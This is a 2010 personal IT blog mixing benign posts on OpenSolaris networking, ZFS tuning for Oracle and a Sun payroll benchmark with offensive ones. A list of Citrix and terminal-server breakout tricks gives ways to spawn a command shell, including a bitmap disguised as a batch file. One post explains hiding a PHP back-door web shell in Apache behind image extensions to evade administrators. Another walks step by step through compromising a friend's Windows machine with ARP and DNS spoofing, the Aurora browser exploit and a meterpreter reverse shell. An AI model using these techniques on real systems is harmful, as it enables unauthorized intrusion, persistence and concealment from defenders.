Sysit's Blog

List of Hacks for TS and Citrix

sysit — Thu, 23 Sep 2010 12:29:21 +0000

Basic shortcuts:

Open file: Ctrl + o
Save File: Ctrl + s
Open New Browser: Ctrl + n, Shift (or Ctrl) + Left Click on link
Browser History: Ctrl + h
Task Manager: Ctrl+Shift+Esc
File manager: Windows + E
Run commands: Windows + R
Utility Manager: Windows + U
Windows search: Windows + F

Open Internet browser:

Press F1 – Click on any URL to open.
Click on help on the language bar.
Windows + U -> Help

Get local files (like cmd.exe):

Printing window (Ctrl + p) -> print to file -> filename=* -> Enter -> and browse to system32
Right Mouse Click (or Shift + F10) -> Save Picture As -> filename=* ->…
View Source -> filename=* ->…

If the right mouse click is forbidden:

Use Shift + F10

Run Command Shell:

Run command.com
Drag other file on cmd.exe or command.com
Shortcut to cmd.exe or command.com
Batch file with: c:\windows\system32\cmd /c (Or /K) any_command
VBS script:

Dim pav
ShellSet pavShell= WScript.CreateObject (“WScript.shell”)
oShell.run “cmd /K CD C:\ & Dir”
Set pavShell= Nothing

Open file manager using IE:

Favorites -> Drag any folder to browser’s window.

Using office applications:

Insert Picture -> filename=* ->…
Insert Hyper Link – > file://c:\windows\system32\cmd.exe
Insert object -> Create from File -> cmd.exe or command.com
Run VB (or VB Macro).

If you can’t run shell:

Rename cmd.exe (or command.com) to applicationName_uCanRun.exe.
Use Debug.exe, using this you can run almost any exe you like. You just need to upload the Assembly code or write by yourself.
Run VB compiler, using office applications

Technique for opening cmd if you have access to MSPaint :
1) Open MSPaint and change image attributes to: Width=6 and Height=1 pixels.
2) Set pixels values to (from left to right):
1st: R: 10, G: 0, B: 0
2nd: R: 13, G: 10, B: 13
3rd: R: 100, G: 109, B: 99
4th: R: 120, G: 101, B: 46
5th: R: 0, G: 0, B: 101
6th: R: 0, G: 0, B: 0
3) Save it as 24-bit Bitmap (*.bmp;*.dib)
4) Change it’s extension from bmp to bat and run.

Metasploit running on iPhone

sysit — Thu, 23 Sep 2010 12:02:38 +0000

Check this out, Metasploit the ultimate all penetration and hacking tool has been updated and now can be run from your iPhone – which turns your iPhone into a nice hacking tool
For more information about how to install and run it , check the following link
http://www.offensive-security.com/offsec/metasploit-3-4-and-set-on-iphone-4/

Networking Setup in Opensolaris

sysit — Thu, 22 Jul 2010 08:26:52 +0000

######################################
# Network Config
######################################
###### DHCP Disable
# rm /etc/dhcp.XXX if exists
svcadm disable nwam
svcadm enable -r network/physical:default

###### IP Address Setup
# ifconfig -a to see network detail
# dladm show-link to see what interfaces are available
# Create trunk 1 (If interface are in use then “ifconfig ce0 down”)
dladm create-aggr -d ce0 -d ce1 -d ce2 -d ce3 1
# Setup LACP Network trunk
dladm modify-aggr -P L2 1
dladm modify-aggr -L active -T short 1
ifconfig aggr1 plumb 10.0.0.10 netmask 255.255.255.0 up

#Configure files
echo 10.0.0.10 > /etc/hostname.aggr1
echo sol02 > /etc/nodename
cp /etc/inet/hosts /etc/inet/hosts.org
echo “::1 localhost” sol02 > /etc/inet/hosts
echo 127.0.0.1 localhost loghost >> /etc/inet/hosts
echo 10.0.0.10 sol02 sol02.home.dom >> /etc/inet/hosts
echo 10.0.0.20 esx01 >> /etc/inet/hosts
echo 10.0.0.0 255.255.255.0 >> /etc/inet/netmasks
echo 10.0.0.1 > /etc/defaultrouter

# vi /etc/resolv.conf and check it is correct i.e hosts file dns included

How to hide your back-door shell in Apache

sysit — Tue, 20 Jul 2010 12:21:07 +0000

When adding a back-door shell in web server one of the most important things is to hide the shell as good as possible from evil Sysadmins

When Sysadmins searching for suspicious files they usually will search for .php , .phtml , cgi , pl …. but file like .jpg or gif usually will be discarded because they are no executable . So it is a good candidate to hide our little shell back-door , but you will say that if we will rename our script to jpg you will need to use include !!! but it is not exactly Wright , to make Apache accept any file as .php will help us .htaccess

1.create .htaccess file in the webserver directory in the file you need to specify your script name for example : AddType application/x-web-php.jpg with this method you can change your php code to any file extension .txt .lol

Sun M5000 Benchmark

sysit — Wed, 14 Jul 2010 12:46:55 +0000

PeopleSoft Payroll 500K Employees on Sun SPARC Enterprise M5000 World Record

Oracle’s Sun SPARC Enterprise M5000 server combined with Oracle’sSun Storage F5100 Flash Array system has producedWorld Record Performance on PeopleSoft Payroll 9.0(North American) 500K employees benchmark.

The Sun SPARC Enterprise M5000 server and the Sun Storage F5100 Flash Array system processed payroll for 500K employees using 32 payroll threads 18% faster than the IBM z10 EC 2097-709mainframe as measured for payroll processing tasks in the Peoplesoft Payroll 9.0 (North American) benchmark.This IBM mainframe is rated at 6,512 MIPS.
The IBM z10 mainframe with nine 4.4 GHz Gen1 processors has a list price over $6M.
The Sun SPARC Enterprise M5000 server together with the Sun Storage F5100 Flash Array system processed payroll for 500K employees using 32 payroll threads 92% faster than an HP rx7640 as measured for payroll processing tasks in the Peoplesoft Payroll 9.0 (North American) benchmark.
The Sun Storage F5100 Flash Array system is a high performance, high density solid state flash array which provides a read latency of only 0.5 msec which is about 10 times faster than the normal disk latencies 5 msec measured on this benchmark.
The Sun SPARC Enterprise M5000 server used the Oracle Solaris 10 operating system and ran with the Oracle 11gR1 database for this benchmark.

Performance Landscape

500K Employees

System	Processor	OS/Database	Time in Minutes				Num of Streams
System	Processor	OS/Database	Payroll Processing Result	Run 1	Run 2	Run 3	Num of Streams
Sun M5000	8x 2.53GHz SPARC64 VII	Solaris/Oracle 11g	50.11	73.88	534.20	1267.06	32
IBM z10	9x 4.4GHz Gen1, 6,512 MIPS	Z/OS /DB2	58.96	80.5	250.68	462.6	8
HP rx7640	8x 1.6GHz Itanium2	HP-UX/Oracle 11g	96.17	133.63	712.72	1665.01	32

Times under all Run columns above represent Payroll processing and
Post-processing elapsed times and furthermore:

Run 1 = 32 parallel job streams & Single Check option = “No”
Run 2 = 32 sequential jobs for Pay Calculation process & 32 parallel
job streams for the rest. Single Check option = “Yes”

Run 3 = One job stream & Single Check option = “Yes”

Times under Result column represents Payroll processing only.

Results and Configuration Summary

Hardware Configuration:

1 x Sun SPARC Enterprise M5000 (8 x 2.53 GHz/64 GB)

1 x Sun Storage F5100 Flash Array (40 x 24 GB FMODs)

1 x StorageTek 2510 (4 x 136 GB SAS 15K RPM)

4 x Dual-Port SAS Fibre Channel Host Bus Adapters (HBA)Software Configuration:

Oracle Solaris 10 10/09

Oracle PeopleSoft HCM and Campus Solutions 9.00.00.311 64-bit

Oracle PeopleSoft Enterprise (PeopleTools) 8.49.25 64-bit

Oracle 11g R1 11.1.0.7 64-bit

Micro Focus COBOL Server Express 4.0 SP4 64-bit

Benchmark Description

The PeopleSoft 9.0 Payroll (North America) benchmark is a performance benchmark established by PeopleSoft to demonstrate system performance for a range of processing volumes in a specific configuration. This information may be used to determine the software, hardware, and
network configurations necessary to support processing volumes. This workload represents large batch runs typical of OLTP workloads during a mass update.

To measure five application business process run times for a database representing large organization. The five processes are:

Paysheet Creation: generates payroll data worksheet for employees,
consisting of std payroll information for each employee for given pay
cycle.
Payroll Calculation: Looks at Paysheets and calculates checks for those
employees.
Payroll Confirmation: Takes information generated by Payroll
Calculation and updates the employees’ balances with the calculated
amounts.
Print Advice forms: The process takes the information generated by
payroll Calculations and Confirmation and produces an Advice for each
employee to report Earnings, Taxes, Deduction, etc.
Create Direct Deposit File: The process takes information generated by
above processes and produces an electronic transmittal file use to
transfer payroll funds directly into an employee bank a/c.

For the benchmark, we collect at least three data points with different number of job streams (parallel jobs). This batch benchmark allows a maximum of thirty-two job streams to be configured to run in parallel.

Disclosure Statement

Oracle PeopleSoft Payroll 9.0 benchmark, Sun SPARC Enterprise M5000
(8 2.53GHz SPARC64 VII) 50.11 min,
IBM z10 (9 gen1) 58.96 min, HP rx7640 (8 1.6GHz Itanium2)
96.17 min

ZFS configuration for Oracle DB

sysit — Wed, 14 Jul 2010 11:53:49 +0000

ZFS file system is Officially supported by Oracle from Database version 10gR2 10.2.0.3 and higher , Oracle supports just single instance on ZFS ,no RAC support currently .

For good Oracle OLTP performance the zfs record size should match Oracle db block size

ZFS mirrored pool or hardware raid is preferable over Raidz pool

ZFS pools for oracle should be at list 3 separate pools

Database pool for Oracle tables , index , undo and temp data

Redo Log pool and a separate zfs log device

Archive log pool – from low end storage

If the database is with high modification activity you should consider separating temp tables from Database pool.

You should consider disabling Oracle checksums because ZFS is doing it too:Alter system set db_block_checksum=OFF scope=both;

Now for the record size for the zfs pools , the Database pool 8KB recordsize and default primarycache value , temp poool default recordsize and default primarycache valu , Redo logs pool default recordsize and default primarycache valu , Archive log pool enable compression default recordsize and primarycache metadata.

You should separate zfs log devices for redo logs – the zfs write speed is heavily dependent on the speed of the log devices , the log devices should be pleased on SSD or NVRAM

How to create a back-door in a windows machine ?

sysit — Fri, 09 Jul 2010 15:20:28 +0000

One of my friends asked me yesterday how to create a back-door in a windows machine ? the target machine was nothing special a normal windows with firewall enabled and up to date anti-virus

The user was using just browser and email .First I tried to search the user machine for some unusual services but with no success , so it is obvious that I need to use functions of Metasploit framework

Now it is relay depends if the user is in the same network with you or not in my case the user was in the same network so now I need to make him visit “my site “ , I will use dns-spoofing . The idea is to intercept the dns requests of the client and response with fake ip address of our web server , depends on situation and your network configuration you might have to use arp-spoofing to redirect traffic thru your server , so we can see the dns requests .

Arpspoof -i eth0 100.168.0.1,

now the dns server ip 100.168.0.1 is spoofed with our server mac !

Echo “1” > /proc/sys/net/ipv4/ip_forward

to forward all incoming traffic

Now for DNS-spoofing in Metasploit there is fake dns but is is much easier to use Digininja module that can be downloaded from digininja.org/metasploit/dns_dhcp.php the biggest difference between two exploits that that one will retune fake responses just for names that stored in dns.txt file all other will be sent to the real dns server

now to the installation

download and unpack

directory dns_mitm move to auxiliary/server in merasploit framework

the lib directory from the archive is for dhcp_exhaustion module but we don’t need this module

no we will go to msfconsole

use auxiliary/server/dns_mitm/dns_mitm

set FILENAME /msf3/modules/auxiliary/server/dns.txt (this is where we will put all the fake dns entries)

set REALDNS 100.168.0.1

run -j

so now we have the module running ( all the path should be relative to metasploit directory and not the full path )

example for dns.txt file

100.168.0.100 google.com.au ( you can add entrees on the flight)

now we can create a web site with the exploit , the exploit should be chosen by the web browser that used by the user , for ie6 and up we will user meterpreter and Aurora .

Use exploit /windows/browser/ms10_002_aurora

set PAYLOAD windows/meterpreter/reverse_tcp

set LPORT 4444

set LHOST 100.168.0.100

set SRVPORT 80

set URIPATH /

exploit

And that it ! So when next time the user will try to brows google.com.au he will hit ouer server and now we have shell access